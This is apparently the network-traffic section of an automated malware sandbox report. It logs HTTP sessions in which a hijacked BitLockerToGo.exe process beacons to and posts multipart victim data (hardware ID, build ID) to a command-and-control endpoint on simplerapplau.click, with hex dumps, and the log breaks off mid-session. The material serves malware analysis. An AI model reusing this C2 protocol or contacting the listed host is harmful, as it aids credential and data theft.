                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983acc7bcd42e3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1561&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1808049&cwnd=204&unsent_bytes=0&cid=7db67ad965b912d3&ts=809&x=0"
                                                                                                                  2024-12-29 07:55:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                  Data Ascii: 2ok
                                                                                                                  2024-12-29 07:55:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549736172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:47 UTC267OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 78
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:55:47 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                  2024-12-29 07:55:48 UTC1119INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:55:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=sadb5f5hs3ukua23n25s7vam6n; expires=Thu, 24 Apr 2025 01:42:27 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLeIRLSKXe9jxJZThDGLbuBJQLfgT1S8DZiA1QnFUKoykDpzoCiO6nFEJHSjO8feHv0DuFJxreM4WxSmtqVjCq5AMAquJd6OuFiLPvqnvW7xRsmqnokUCsh8i24XVWpkgTZQ39ow"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983ada79760f49-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1653&rtt_var=631&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=981&delivery_rate=1720683&cwnd=215&unsent_bytes=0&cid=b09f9cebeeebcdcc&ts=853&x=0"
                                                                                                                  2024-12-29 07:55:48 UTC250INData Raw: 34 36 65 0d 0a 75 7a 4c 33 44 45 46 63 31 76 54 67 64 6f 59 38 42 4a 36 56 62 68 7a 41 6d 5a 4d 6f 32 30 6d 41 6c 48 35 66 37 43 59 79 48 59 58 41 45 49 45 75 65 32 6a 36 31 70 4d 54 70 41 5a 69 2f 2f 6b 64 65 65 79 37 38 6b 7a 35 63 2b 62 31 45 69 79 4a 43 68 42 72 36 4a 6b 49 6b 57 30 74 4c 37 50 59 77 68 50 2b 48 6a 37 46 37 6b 78 35 72 72 75 70 43 72 34 6a 34 76 55 53 50 59 31 4e 58 57 33 70 32 46 71 62 61 79 6b 35 74 5a 43 42 47 75 74 5a 59 66 76 30 42 48 4b 70 39 50 74 46 2b 57 57 69 38 51 52 39 31 67 52 2f 65 50 48 61 66 35 5a 2f 4b 6e 36 72 32 4a 74 55 34 31 49 6d 70 4c 63 50 65 61 4c 31 39 55 79 77 49 65 6a 38 47 6a 79 49 54 45 4a 30 34 39 4e 61 6c 57 67 6f 4d 37 79 45 6a 42 44 73 55 6d 66 78 39 45 77 77 34 76 7a 70 43 75 46 72 73
                                                                                                                  Data Ascii: 46euzL3DEFc1vTgdoY8BJ6VbhzAmZMo20mAlH5f7CYyHYXAEIEue2j61pMTpAZi//kdeey78kz5c+b1EiyJChBr6JkIkW0tL7PYwhP+Hj7F7kx5rrupCr4j4vUSPY1NXW3p2Fqbayk5tZCBGutZYfv0BHKp9PtF+WWi8QR91gR/ePHaf5Z/Kn6r2JtU41ImpLcPeaL19UywIej8GjyITEJ049NalWgoM7yEjBDsUmfx9Eww4vzpCuFrs
                                                                                                                  2024-12-29 07:55:48 UTC891INData Raw: 63 51 66 4c 4a 39 52 58 57 2f 68 6d 55 2f 62 64 32 4d 35 75 4e 62 61 56 4f 78 53 61 50 6e 30 41 33 6d 6a 2b 2b 4e 46 75 53 6a 71 2f 68 67 33 67 55 74 66 63 65 33 65 57 4a 78 70 4c 44 6d 38 6b 49 30 58 70 42 41 6d 2b 2b 39 4d 4a 75 4c 62 34 55 6d 36 50 2b 2f 6e 58 43 4c 41 58 52 42 34 36 35 6b 49 31 57 67 74 50 37 6d 57 6b 42 7a 76 56 57 50 75 2f 41 56 7a 72 2f 76 38 51 4c 59 6f 34 76 45 57 4e 34 46 4f 56 48 4c 71 33 31 43 56 4c 6d 31 2b 73 34 37 43 54 4b 52 39 59 2b 7a 77 41 47 6a 67 77 62 46 56 39 7a 4b 69 38 52 42 39 31 67 52 59 65 75 54 61 57 35 70 74 4b 7a 57 6d 6c 70 41 53 36 56 74 30 2b 76 49 43 64 4b 48 70 2b 30 53 2f 4b 4f 76 39 46 54 69 4a 51 42 41 78 70 39 35 49 31 54 5a 6a 48 37 6d 64 6a 68 37 7a 58 69 62 6a 75 52 55 2b 70 66 65 78 45 76 6b 76
                                                                                                                  Data Ascii: cQfLJ9RXW/hmU/bd2M5uNbaVOxSaPn0A3mj++NFuSjq/hg3gUtfce3eWJxpLDm8kI0XpBAm++9MJuLb4Um6P+/nXCLAXRB465kI1WgtP7mWkBzvVWPu/AVzr/v8QLYo4vEWN4FOVHLq31CVLm1+s47CTKR9Y+zwAGjgwbFV9zKi8RB91gRYeuTaW5ptKzWmlpAS6Vt0+vICdKHp+0S/KOv9FTiJQBAxp95I1TZjH7mdjh7zXibjuRU+pfexEvkv
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 33 36 31 61 0d 0a 58 32 58 50 6b 30 72 4f 39 63 4f 6f 49 45 43 44 2f 6f 31 6c 2b 64 62 69 49 36 75 5a 4b 44 47 65 68 58 5a 66 44 37 42 48 4f 75 2f 2f 35 43 73 53 6a 71 35 42 49 7a 69 45 4a 51 65 71 65 58 45 4a 4a 32 59 32 62 30 73 6f 77 44 38 46 55 6b 79 66 51 43 63 4b 58 74 73 56 58 33 4d 71 4c 78 45 48 33 57 42 46 35 79 37 4e 56 58 6e 47 38 67 50 72 36 59 6a 52 37 73 56 6d 62 78 39 67 64 32 70 50 62 36 52 62 59 73 36 76 55 51 4f 49 4e 48 45 44 47 6e 33 6b 6a 56 4e 6d 4d 62 75 70 57 54 42 61 5a 72 5a 66 4c 35 43 32 6a 69 35 4c 39 54 2b 53 7a 75 74 6b 52 39 68 45 4e 58 65 2b 72 54 55 35 46 71 4c 6a 47 39 6e 34 73 47 37 6c 4a 6f 37 76 6f 47 65 36 7a 33 39 45 57 35 4b 75 50 34 46 6a 62 4f 43 68 42 34 2f 35 6b 49 31 55 45 75 4c 71 61 63 69 51 57 6d 61 32 58
                                                                                                                  Data Ascii: 361aX2XPk0rO9cOoIECD/o1l+dbiI6uZKDGehXZfD7BHOu//5CsSjq5BIziEJQeqeXEJJ2Y2b0sowD8FUkyfQCcKXtsVX3MqLxEH3WBF5y7NVXnG8gPr6YjR7sVmbx9gd2pPb6RbYs6vUQOINHEDGn3kjVNmMbupWTBaZrZfL5C2ji5L9T+SzutkR9hENXe+rTU5FqLjG9n4sG7lJo7voGe6z39EW5KuP4FjbOChB4/5kI1UEuLqaciQWma2X
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 75 4c 55 38 6c 79 7a 61 2f 32 34 42 58 32 4a 53 42 41 6e 70 39 4e 63 6b 57 30 76 4e 37 69 62 67 78 44 6a 55 32 4c 38 38 51 70 37 6f 2f 44 35 52 72 59 68 37 76 49 51 4e 49 68 49 55 33 7a 68 6d 52 37 56 61 54 74 2b 37 4e 61 6a 47 65 39 53 5a 76 2f 6d 43 7a 37 73 75 2f 39 4d 75 57 75 36 34 41 77 71 69 56 73 65 5a 71 66 65 58 4e 55 32 59 7a 53 6d 6b 34 77 51 37 6c 74 69 38 50 30 4d 65 37 44 7a 39 30 32 31 49 2b 66 35 47 6a 69 44 51 31 74 38 39 63 74 54 6b 57 41 76 66 76 72 57 68 51 79 6b 42 69 62 5a 34 41 39 75 70 50 69 78 56 66 63 79 6f 76 45 51 66 64 59 45 55 48 48 72 30 6c 65 65 5a 53 63 36 74 4a 75 4a 47 75 70 58 61 76 54 37 43 32 79 76 2f 76 6c 41 73 43 37 75 2b 78 38 76 6a 55 55 51 4d 61 66 65 53 4e 55 32 59 78 6d 48 6f 61 46 55 2b 78 42 2f 76 50 41 41
                                                                                                                  Data Ascii: uLU8lyza/24BX2JSBAnp9NckW0vN7ibgxDjU2L88Qp7o/D5RrYh7vIQNIhIU3zhmR7VaTt+7NajGe9SZv/mCz7su/9MuWu64AwqiVseZqfeXNU2YzSmk4wQ7lti8P0Me7Dz9021I+f5GjiDQ1t89ctTkWAvfvrWhQykBibZ4A9upPixVfcyovEQfdYEUHHr0leeZSc6tJuJGupXavT7C2yv/vlAsC7u+x8vjUUQMafeSNU2YxmHoaFU+xB/vPAA
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 31 4a 74 69 43 69 36 56 49 6b 7a 6b 4e 63 50 37 2b 5a 56 35 31 6d 4c 54 32 79 6e 59 34 59 35 56 64 67 2b 66 38 4c 63 61 58 79 39 6b 71 2f 4f 65 58 37 46 54 32 46 54 56 70 37 35 74 49 51 32 79 34 6b 4a 76 54 4f 77 69 62 6a 53 48 62 2f 74 78 4d 77 75 37 76 32 52 76 6c 7a 6f 76 73 4f 50 49 74 57 56 48 44 73 79 31 75 54 62 69 59 73 73 35 71 49 47 2b 64 57 61 2f 2f 2f 48 6e 36 76 2b 2b 4e 59 76 79 44 73 74 6c 4a 39 69 56 77 51 4a 36 66 6f 52 35 34 75 50 48 43 74 31 6f 55 59 70 41 59 6d 2f 2f 30 42 63 4c 44 2f 39 30 47 36 4a 65 72 7a 46 44 6d 45 53 56 39 30 37 64 42 59 6c 57 45 6d 4e 72 2b 51 6a 42 58 69 55 6d 75 38 75 55 78 35 75 72 75 70 43 70 34 78 37 2f 41 4c 4c 4c 74 44 55 43 36 6e 78 68 36 4d 4c 69 51 79 39 4d 37 43 47 65 68 55 61 2f 6e 7a 42 48 6d 68 2b
                                                                                                                  Data Ascii: 1JtiCi6VIkzkNcP7+ZV51mLT2ynY4Y5Vdg+f8LcaXy9kq/OeX7FT2FTVp75tIQ2y4kJvTOwibjSHb/txMwu7v2RvlzovsOPItWVHDsy1uTbiYss5qIG+dWa///Hn6v++NYvyDstlJ9iVwQJ6foR54uPHCt1oUYpAYm//0BcLD/90G6JerzFDmESV907dBYlWEmNr+QjBXiUmu8uUx5urupCp4x7/ALLLtDUC6nxh6MLiQy9M7CGehUa/nzBHmh+
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 73 37 72 5a 45 66 59 42 4a 56 6e 37 6d 30 56 69 56 61 43 6b 36 74 35 2b 42 45 2b 31 59 62 66 2f 39 41 33 6d 6b 2f 2f 46 42 76 69 58 6b 38 78 63 30 7a 67 6f 51 65 50 2b 5a 43 4e 56 49 41 43 79 6d 70 49 77 58 2f 78 35 35 73 75 35 4d 65 61 36 37 71 51 71 79 49 2b 33 6b 47 54 53 47 51 46 6c 2f 34 39 4e 64 6b 6d 34 6d 4d 37 47 53 6a 42 44 6a 58 6d 72 7a 38 41 52 78 70 76 76 2b 43 76 64 72 35 65 35 63 5a 63 35 6b 57 32 6e 47 31 31 75 48 4c 6a 78 77 72 64 61 46 47 4b 51 47 4a 76 4c 2b 44 58 61 73 39 2f 6c 4f 71 79 76 70 2f 78 4d 38 67 55 52 54 66 75 33 52 51 70 4e 75 4b 44 61 7a 6e 6f 59 61 39 6c 39 70 76 4c 6c 4d 65 62 71 37 71 51 71 49 50 65 58 78 45 33 2b 6e 51 30 74 2b 37 64 70 62 6d 53 34 38 63 4b 33 57 68 52 69 6b 42 69 62 78 2b 77 46 36 73 50 66 78 53 72
                                                                                                                  Data Ascii: s7rZEfYBJVn7m0ViVaCk6t5+BE+1Ybf/9A3mk//FBviXk8xc0zgoQeP+ZCNVIACympIwX/x55su5Mea67qQqyI+3kGTSGQFl/49Ndkm4mM7GSjBDjXmrz8ARxpvv+Cvdr5e5cZc5kW2nG11uHLjxwrdaFGKQGJvL+DXas9/lOqyvp/xM8gURTfu3RQpNuKDaznoYa9l9pvLlMebq7qQqIPeXxE3+nQ0t+7dpbmS48cK3WhRikBibx+wF6sPfxSr
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 46 7a 4f 4c 52 56 78 31 34 4e 64 43 6c 47 51 76 50 37 4f 52 69 51 62 76 54 47 33 30 39 41 4a 32 71 2f 76 2f 53 72 67 6d 34 72 5a 53 66 59 6c 63 45 43 65 6e 2f 48 4f 43 65 43 6c 38 6c 34 47 55 48 75 4e 53 63 50 66 32 44 32 69 76 36 37 45 45 2b 54 72 6c 35 31 78 6c 6d 46 52 48 65 50 69 58 53 64 56 70 4c 33 37 73 31 6f 6b 62 36 6c 4e 74 2b 50 34 4a 64 71 48 2b 39 45 43 31 4a 2b 50 2b 46 54 65 4c 51 56 5a 31 35 4e 64 66 6c 47 49 6e 4e 37 71 66 77 6c 71 6b 57 58 36 38 72 30 78 49 73 76 7a 70 52 36 6c 70 30 50 55 4e 4c 4a 74 4a 51 48 6d 6c 39 6c 4f 5a 62 53 59 35 70 4e 61 64 57 76 30 65 59 66 43 33 56 44 36 69 2f 2f 31 4a 76 69 58 74 2b 78 4d 36 68 55 74 61 63 66 58 57 56 5a 31 69 4b 7a 4f 6d 6e 49 67 47 37 56 64 72 38 76 38 65 66 65 4b 31 73 55 32 68 61 37 71
                                                                                                                  Data Ascii: FzOLRVx14NdClGQvP7ORiQbvTG309AJ2q/v/Srgm4rZSfYlcECen/HOCeCl8l4GUHuNScPf2D2iv67EE+Trl51xlmFRHePiXSdVpL37s1okb6lNt+P4JdqH+9EC1J+P+FTeLQVZ15NdflGInN7qfwlqkWX68r0xIsvzpR6lp0PUNLJtJQHml9lOZbSY5pNadWv0eYfC3VD6i//1JviXt+xM6hUtacfXWVZ1iKzOmnIgG7Vdr8v8efeK1sU2ha7q
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 48 70 77 64 50 48 59 58 5a 35 69 48 51 43 68 6c 59 77 61 34 30 68 33 76 4c 6c 4d 63 65 4b 6a 79 41 72 78 61 39 32 34 58 43 58 4f 48 42 42 4b 35 4e 64 65 6b 6e 67 79 63 35 53 64 6c 42 58 70 56 57 71 2b 39 67 46 75 70 62 75 2f 43 72 39 72 75 71 5a 53 66 59 70 56 45 43 65 33 69 77 76 41 50 58 52 75 35 6f 6e 4d 44 61 52 49 4a 71 53 6c 51 6a 36 77 75 36 6b 4b 2f 69 6a 77 35 42 6f 2b 6d 45 63 58 51 64 6e 35 57 35 6c 74 4c 7a 2b 7a 31 73 78 55 36 78 34 2b 78 62 63 50 62 4c 43 30 34 46 79 30 4f 2b 57 36 46 43 79 44 53 42 41 78 70 35 56 55 6e 6d 49 6d 4f 61 54 5a 6b 41 54 76 55 6e 43 77 38 78 34 2b 37 4c 76 67 51 62 59 35 37 50 46 54 4c 4a 68 4a 51 48 7a 69 33 68 79 64 66 79 34 79 39 4e 6a 43 41 65 39 53 59 50 48 69 51 32 2b 30 2b 4f 64 4e 39 53 50 7a 2b 78 42 39
                                                                                                                  Data Ascii: HpwdPHYXZ5iHQChlYwa40h3vLlMceKjyArxa924XCXOHBBK5Ndekngyc5SdlBXpVWq+9gFupbu/Cr9ruqZSfYpVECe3iwvAPXRu5onMDaRIJqSlQj6wu6kK/ijw5Bo+mEcXQdn5W5ltLz+z1sxU6x4+xbcPbLC04Fy0O+W6FCyDSBAxp5VUnmImOaTZkATvUnCw8x4+7LvgQbY57PFTLJhJQHzi3hydfy4y9NjCAe9SYPHiQ2+0+OdN9SPz+xB9
                                                                                                                  2024-12-29 07:55:48 UTC1369INData Raw: 65 6e 67 52 43 67 62 53 30 77 73 34 43 54 57 63 4a 64 59 66 72 30 41 6d 6d 7a 75 37 38 4b 76 32 75 36 70 46 4a 39 69 6c 55 51 4a 37 65 4c 43 38 41 39 64 47 37 6d 69 63 77 4e 70 45 67 6d 70 4b 52 43 50 72 43 37 71 51 72 2b 4a 65 2f 33 48 7a 4f 4e 56 6b 4a 35 35 4d 39 54 30 6c 41 64 47 37 6d 62 68 78 72 6a 59 46 6a 64 2f 52 78 7a 72 66 7a 50 64 49 34 36 35 65 5a 65 47 34 31 53 55 7a 2b 70 6d 55 6a 56 4e 6d 4d 66 76 6f 61 50 47 2b 4d 65 4b 4c 7a 7a 54 43 62 69 33 76 78 48 76 43 58 6c 74 44 30 33 6e 6b 6c 66 65 4b 65 58 45 4a 6b 75 65 33 36 31 6e 4a 49 5a 36 31 6b 71 2b 2b 30 4c 50 75 79 37 2f 77 72 68 61 2b 50 38 44 44 43 42 51 78 78 35 36 64 63 51 69 69 41 36 66 71 4c 57 32 6b 65 71 48 6e 53 38 72 30 77 35 72 50 62 77 53 62 63 6f 38 4f 51 61 50 70 68 48 46
                                                                                                                  Data Ascii: engRCgbS0ws4CTWcJdYfr0Ammzu78Kv2u6pFJ9ilUQJ7eLC8A9dG7micwNpEgmpKRCPrC7qQr+Je/3HzONVkJ55M9T0lAdG7mbhxrjYFjd/RxzrfzPdI465eZeG41SUz+pmUjVNmMfvoaPG+MeKLzzTCbi3vxHvCXltD03nklfeKeXEJkue361nJIZ61kq++0LPuy7/wrha+P8DDCBQxx56dcQiiA6fqLW2keqHnS8r0w5rPbwSbco8OQaPphHF


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549742172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:50 UTC286OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=I0TSYDJPODGS26X2PZT
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 12840
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:55:50 UTC12840OUTData Raw: 2d 2d 49 30 54 53 59 44 4a 50 4f 44 47 53 32 36 58 32 50 5a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 49 30 54 53 59 44 4a 50 4f 44 47 53 32 36 58 32 50 5a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 30 54 53 59 44 4a 50 4f 44 47 53 32 36 58 32 50 5a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49
                                                                                                                  Data Ascii: --I0TSYDJPODGS26X2PZTContent-Disposition: form-data; name="hwid"07EF6CF104BC9C8FEB3EC5FED8AD62A8--I0TSYDJPODGS26X2PZTContent-Disposition: form-data; name="pid"2--I0TSYDJPODGS26X2PZTContent-Disposition: form-data; name="lid"hRjzG3--ZI
                                                                                                                  2024-12-29 07:55:53 UTC1130INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:55:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=30urjb3tdv4thi477ofngj7v6m; expires=Thu, 24 Apr 2025 01:42:29 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SSRQ0OSoPYQlOzWDhKPiZnzWo0TtJzetkYZ8pz2TCypVgHsEvDO2oqXAT8efkNQzVC4zIu7sOl9CTaVYyqfwKq1qNQx9%2BWl1GWA7VpR9QXS3NewehYSxAy60M%2B9Hk%2FFNfI81WKxd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983ae85e9372a1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1820&rtt_var=733&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13784&delivery_rate=1604395&cwnd=194&unsent_bytes=0&cid=a3c36fd18e1e839c&ts=3049&x=0"
                                                                                                                  2024-12-29 07:55:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-29 07:55:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549753172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:54 UTC285OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=8F5H32CW93AYV919H6
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 15076
                                                                                                                  Host: simplerapplau.click
                                                                                                                  2024-12-29 07:55:54 UTC15076OUTData Raw: 2d 2d 38 46 35 48 33 32 43 57 39 33 41 59 56 39 31 39 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 45 46 36 43 46 31 30 34 42 43 39 43 38 46 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 38 46 35 48 33 32 43 57 39 33 41 59 56 39 31 39 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 46 35 48 33 32 43 57 39 33 41 59 56 39 31 39 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d
                                                                                                                  Data Ascii: --8F5H32CW93AYV919H6Content-Disposition: form-data; name="hwid"07EF6CF104BC9C8FEB3EC5FED8AD62A8--8F5H32CW93AYV919H6Content-Disposition: form-data; name="pid"2--8F5H32CW93AYV919H6Content-Disposition: form-data; name="lid"hRjzG3--ZINA
                                                                                                                  2024-12-29 07:55:55 UTC1130INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 07:55:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=3rg6p9jst7705hie2qqa0q4pb3; expires=Thu, 24 Apr 2025 01:42:34 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7UZwfHCTsK5PiKvzQ4yukR2ASB%2BUD6PN24LoGSmj37eBGQCJ598apdQda6ydm55cQkIz65G0PvIb5Ic2oD%2B5JMFqTiYqj1guNBbvUEFjzFFOkHvZD3NtSioeS%2FlfNxtbNC9T5n%2Br"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f983b0418144294-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1554&rtt_var=602&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2849&recv_bytes=16019&delivery_rate=1790312&cwnd=217&unsent_bytes=0&cid=3dbe09b3abce5bdb&ts=928&x=0"
                                                                                                                  2024-12-29 07:55:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-29 07:55:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549759172.67.152.1604435284C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 07:55:57 UTC279OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=0884LFAMPTZE
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 20530
                                                                                                                  Host: simplerapplau.click
